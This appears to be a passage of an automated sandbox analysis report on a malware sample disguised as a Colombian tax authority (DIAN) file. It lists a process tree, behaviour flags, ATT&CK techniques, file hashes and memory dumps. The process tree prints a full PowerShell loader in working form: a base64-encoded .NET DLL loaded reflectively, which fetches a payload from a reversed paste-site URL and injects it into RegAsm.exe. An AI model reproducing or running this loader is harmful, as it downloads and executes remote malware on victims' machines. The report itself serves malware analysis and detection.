AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');powershell.exe -Command $VXdfe; Remove-Item -Path C:\Users\Admin\AppData\Local\Temp\DIRRECCION DE IMPUESTO Y ADUANAS NACIONALES DIAN.exe.vbs
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3260
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIw7PZkAAAAAAAAAAOAAAiELAVAAABwAAAAGAAAAAAAAAjsAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAK06AABPAAAAAEAAAEgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAD8OQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAACBsAAAAgAAAAHAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAEgDAAAAQAAAAAQAAAAeAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAIgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADhOgAAAAAAAEgAAAACAAUAxCIAAIAWAAADAAAAAAAAAEQ5AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKBcAAAoqHgIoGAAACiqmcxkAAAqAAQAABHMaAAAKgAIAAARzGwAACoADAAAEcxwAAAqABAAABCoufgEAAARvHQAACioufgIAAARvHgAACioufgMAAARvHwAACioufgQAAARvIAAACirGfgUAAAQUKCEAAAosHnIBAABw0AUAAAIoIgAACm8jAAAKcyQAAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDAAABiglAAAKdAYAAAKABwAABCoeAigmAAAKKhp+BwAABCoaKA0AAAYqHgIoJwAACioAGzAHANAAAAABAAARIAAMAAAoKAAACnMpAAAKJSgqAAAKbysAAApyMQAAcCgsAAAKby0AAAoKBigsAAAKCgZyrQAAcHKzAABwby4AAAoKcykAAAolKCoAAApvKwAACgIoLAAACm8tAAAKCwcoLAAACgtytwAAcAwIcv0AAHAoLwAACgwoMAAACgYoMQAACm8yAAAKchUBAHBvMwAACnI/AQBwbzQAAAoUGI0XAAABJRYIckcBAHAoLwAACqIlFwcoMQAACqJvNQAACibeDiUoNgAACg0oNwAACt4AKgEQAAAAAAAAwcEADiIAAAE2AgMoOAAACig5AAAKKh4CKDoAAAoqLtAJAAACKCIAAAoqHgIoOwAACioAABMwAQAUAAAAAgAAEQKMBQAAGy0IKAEAACsKKwICCgYqIgP+FQUAABsqHgIoJwAACioAAAATMAIAKAAAAAMAABECez0AAApvPgAACgoGjAgAABstEigCAAArCgJ7PQAACgZvPwAACgYqSgIoJwAACgJzQAAACn09AAAKKgBCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAD4BwAAI34AAGQIAACgCAAAI1N0cmluZ3MAAAAABBEAAGABAAAjVVMAZBIAABAAAAAjR1VJRAAAAHQSAAAMBAAAI0Jsb2IAAAAAAAAAAgAAAVcVogkJDwAAAPoBMwAWAAABAAAAMgAAAAoAAAAIAAAAGQAAAAUAAABAAAAAQAAAAAMAAAAFAAAACQAAAAoAAAAIAAAAAQAAAAMAAAABAAAAAgAAAAMAAAACAAAAAACwBAEAAAAAAAYAcgNbBwYA3wNbBwYASQKcBg8AyQcAAAYAigJrBQYAVQNrBQYAxgNrBQYAkgNrBQYAqwNrBQYA0QJrBQYAdgIVBwYA8gEVBwYAHQNrBQYA7AItBAoAFQIqBgoAwgGaBAoAXQKaBA4AjwHrBg4AWgavBgYABQOcBg4AoQI0Bw4AuQKWAAYAHgjXBA4ARgbrBg4AOgOWAAYAVwHXBA4AAQBwBAoAAALqBAYALAKcBgYA1wFbBwYABgZ7BwYAlgVWBQoAnwFBBQYAfQXXBAYAGwHXBAYAgwhrBQoAqgFBBQoAFgYvCAoAPwEvCAoARggvCAYAJARYCA4A2AeWAAYAaQTXBAYABwXXBAYAUAjXBAYAiwVrBQYAhAFrBQ4AgQA0BwYACAhbBwYAhQbXBAAAAABJAAAAAAABAAEAAAAAADMFbghJAAEAAQAAAAAAWAZuCE0AAQACAAABEAAlCG4IXQABAAMAAAEAAJ0HjAddAAUACAAAARAA7QduCIUABwALAAABAACMCG4IXQAIAA4AAQAAACsAMgBdAAgADwAFAQAA3QYAAF0ACAARAAUBAAAQAAAAXQAIABgAMQDLBToBMQCiBUIBMQC2BUoBMQDkBVIBEQDeBFoBEQB0AV4BEQDvAGMBIQBkCAsBUCAAAAAABhiPBgYAAQBYIAAAAAAGGI8GBgABAGAgAAAAABEYlQbWAAEAiiAAAAAAEwhLBmcBAQCWIAAAAAATCCMFbAEBAKIgAAAAABMIQgZxAQEAriAAAAAAEwjNBnYBAQC6IAAAAAATCAIGewEBAOwgAAAAABMIXAGAAQEA8yAAAAAAEwhoAYYBAQD7IAAAAAARGJUG1gACABEhAAAAAAYYjwYGAAIAGSEAAAAAFgg6CI0BAgAgIQAAAAATCOAHjQECACchAAAAAAYYjwYGAAIAMCEAAAAAFgCHBZIBAgAcIgAAAADGAgEI3wADACoiAAAAAMYCCAHkAAQAMiIAAAAAgwBUAZcBBAA+IgAAAADGAmcE6AAEAEgiAAAAABEAbgCcAQQAaCIAAAAAAQBaAKQBBQBxIgAAAAAGGI8GBgAGAHwiAAAAAAMI3wBKAAYAsCIAAAAABhiPBgYABgAAAAEAGgQAAAEAVAAAAAEAoAUAAAEA/wAAAAEA/wAJAI8GAQARAI8GBgAZAI8GCgApAI8GEAAxAI8GEAA5AI8GEABBAI8GEABJAI8GEABRAI8GEABZAI8GFQBhAI8GEABpAI8GEABxAI8GEAB5AI8GGgCJAI8GIAChAI8GBgCpAI8GBgCxAI8GBgDJAI8GJgDhAI8GEADpAI8GBgDxAI8GBgCRAI8GBgCZAI8GBgAMAI8GBgAUAI8GBgAcAI8GBgAkAI8GBgAMAN8ASgAUAN8ASgAcAN8ASgAkAN8ASgC5APgHTwDRAC0BVQDRAH8IXQD5AI8GYwApAbEAawAJAY8GBgC5AI8GBgAxAcIEfQBBAY8GBgBJAUAAhABBASAEigBRAbcBkQBBAVgElgBZAcgAmwBZARcIoQBhAREFpwBpAUcErQBhAawAswAhAVQBuwDRAL4AwQB5ARQByACBAXUGzwCBAWMG1gCJAREE2gC5AAEI3wC5AAgB5AC5AGcE6ACRAdAA9AA0AGQICwE8AP0DSgA8AAcEIgE8AI8GBgApAKMAsgMuAAsA1QEuABMA3gEuABsA/QEuACMABgIuACsABgIuADMABgIuADsABgIuAEMABgIuAEsABgIuAFMABgIuAFsADAIuAGMANgIuAGsAQwJAAIMAjQJAAHsAkgJDAHMAmwJDAHsAkgJJAKMAwwNjAHMAmwJjAHsAkgJpAKMA1wOAAIMAjQKDAIsAjQKDAJMAjQKDAHMAmwKJAKMA5AOgAIMAjQKjAIsAjQKjAHMAtAKjAKsAjQKjALMAjQKjAJMAjQKpAHsA/QHAAIMAjQLDALMAjQLDAHMA9gLDAHsA/QHJAHsA/QHgAIMAjQLjAIsAjQLjAJMAjQLjAKsAjQLjALMAjQIJAaMA+AMjAXsAkgIjAZsAUANDAXsAkgJDAVMABgIgAnsAkgIgAoMAjQJAAnsAkgJAAoMAjQJgAnsAkgJgAoMAjQKAAnsAkgKAAoMAjQKgAoMAjQLAAoMAjQLgAoMAjQLgAnsAkgIAA4MAjQIgA4MAjQIgA3sAkgJ0AOwA/wAEAAEABQAFAAYABwAHAAgACgAJAAAAWgasAQAANQWxAQAARga2AQAA3wa7AQAABgbAAQAAfAHFAQAAPgjLAQAA7wfLAQAA4wDQAQIABAADAAIABQAFAAIABgAHAAIABwAJAAIACAALAAIACQANAAEACgANAAIADQAPAAIADgARAAIAGAATAC4ANQA8AEMA8QAEARMBGgEEgAAAAQAAAAAAAAAAAAAAAAAyAAAABAAAAAAAAAAAAAAAKAGNAAAAAAAEAAAAAAAAAAAAAAAoAdcEAAAAAAoAAAAAAAAAAAAAADEBlgAAAAAAAAAAAAEAAACnBwAACQAEAAoABAAAABAAFABSAAAAEAArAFIAAAAAAC0AUgB5APoAeQAdAQAAAAAAQ29udGV4dFZhbHVlYDEAVGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDEAQ2xhc3MxAENsYXNzTGlicmFyeTMAZ2V0X1VURjgAPE1vZHVsZT4AVABRQlh0WABEaXNwb3NlX19JbnN0YW5jZV9fAENyZWF0ZV9fSW5zdGFuY2VfXwBQcm9qZWN0RGF0YQBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMATG9hZABTeW5jaHJvbml6ZWQAR2V0TWV0aG9kAFJlcGxhY2UAQ3JlYXRlSW5zdGFuY2UAZ2V0X0dldEluc3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEhlbHBLZXl3b3JkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAe3QAeAB0AC4AMwAwAGUAcABtAHUAUgAvADMAMAAtAGUAcABtAHUAcgAvAHMAbQBlAHQAaQAvADIAMQAvAGcAcgBvAC4AZQB2AGkAaABjAHIAYQAuAHMAdQAuADMAMAA0ADEAMAA2AGEAaQAvAC8AOgBzAHAAdAB0AGgAAQUDJgMmAQNBAABFQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawAAF1wAdgA0AC4AMAAuADMAMAAzADEAOQAAKUMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBDAGwAYQBzAHMAMQAAB1IAdQBuAAAXXABSAGUAZwBBAHMAbQAuAGUAeABlAAAAe000wQGMFUmZ7QBV0BJNAQAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCAcEDg4OEoCJBgABARGAnQUAABKApQYgAQESgKUEAAEODgQgAQ4OBSACDg4OBQACDg4OBQAAEoCxBQABHQUOByABEoCRHQUFIAESaQ4GIAESgLkOBiACHBwdHAYAAQESgIkDAAABBAABHBwEIAECHAMgAAgDIAAOBAcBHgACHgAFEAEAHgAECgEeAAQHARMABhUSKAETAAcGFRJtARMABhUSbQETAAITAAQKARMABSABARMACLd6XFYZNOCJCLA/X38R1Qo6BwYVEigBEgwHBhUSKAESCAcGFRIoARJhBwYVEigBEiQDBhJ9BAYSgIEDBhIYBAAAEgwEAAASCAQAABJhBAAAEiQEAAASfQUAABKAgQYAAQESgIEEAAASGAQAAQEOBCAAEmkHEAEBHgAeAAcwAQEBEB4ABAgAEgwECAASCAQIABJhBAgAEiQECAASfQUIABKAgQQIABIYBCgAEwAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAABQEAAAAAKQEAJDc5MTcyQjEzLUVEQkEtNDA5Ni1CNzI1LThFOTJCNzMwQjJCQQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuNQEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC41BAEAAAAIAQABAAAAAAAYAQAKTXlUZW1wbGF0ZQgxMS4wLjAuMAAAQQEAM1N5c3RlbS5SZXNvdXJjZXMuVG9vbHMuU3Ryb25nbHlUeXBlZFJlc291cmNlQnVpbGRlcggxNi4wLjAuMAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxNi4yLjAuMAAAYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAQAQALTXkuQ29tcHV0ZXIAABMBAA5NeS5BcHBsaWNhdGlvbgAADAEAB015LlVzZXIAABMBAA5NeS5XZWJTZXJ2aWNlcwAAEAEAC015LlNldHRpbmdzAAAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAAAAAAAAAAAFBBRFBBRFC0AAAAAAAAAEjHs6YAAAAAAgAAAHkAAAA0OgAANBwAAAAAAAAAAAAA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';[Byte[]] $HWqMQ = [System.Convert]::FromBase64String( $pICwv );[System.AppDomain]::CurrentDomain.Load($HWqMQ).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('ZL8b/war/edoc/oi.slootw//:sptth'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3552
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:3888
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k wsappx -p
    1⤵
      PID:3704

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Remote System Discovery

    1
    T1018

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      feadc4e1a70c13480ef147aca0c47bc0

      SHA1

      d7a5084c93842a290b24dacec0cd3904c2266819

      SHA256

      5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

      SHA512

      c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      e5ea61f668ad9fe64ff27dec34fe6d2f

      SHA1

      5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

      SHA256

      8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

      SHA512

      cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

      Download Submit
    • memory/3260-148-0x0000021771700000-0x0000021771702000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3260-149-0x0000021771703000-0x0000021771705000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3260-150-0x0000021771706000-0x0000021771708000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3552-157-0x000002582DA80000-0x000002582DA82000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3552-159-0x000002582DA86000-0x000002582DA88000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3552-158-0x000002582DA83000-0x000002582DA85000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3888-160-0x0000000000400000-0x000000000040C000-memory.dmp
      Filesize

      48KB

      Download
    • memory/3888-164-0x00000000051D0000-0x000000000526C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/3888-165-0x0000000005820000-0x0000000005DC4000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/3888-166-0x0000000005400000-0x0000000005492000-memory.dmp
      Filesize

      584KB

      Download
    • memory/3888-167-0x0000000005270000-0x0000000005814000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/3888-168-0x00000000053D0000-0x00000000053DA000-memory.dmp
      Filesize

      40KB

      Download
    • memory/3888-169-0x0000000005600000-0x0000000005666000-memory.dmp
      Filesize

      408KB

      Download
    • memory/4036-135-0x00000285CFD53000-0x00000285CFD55000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4036-136-0x00000285B6200000-0x00000285B6222000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4036-134-0x00000285CFD50000-0x00000285CFD52000-memory.dmp
      Filesize

      8KB

      Download